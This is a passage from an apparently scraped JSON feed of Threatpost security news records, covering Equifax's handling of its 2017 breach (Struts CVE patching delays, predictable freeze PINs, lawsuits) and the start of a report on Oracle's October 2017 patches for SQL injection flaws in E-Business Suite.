echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system H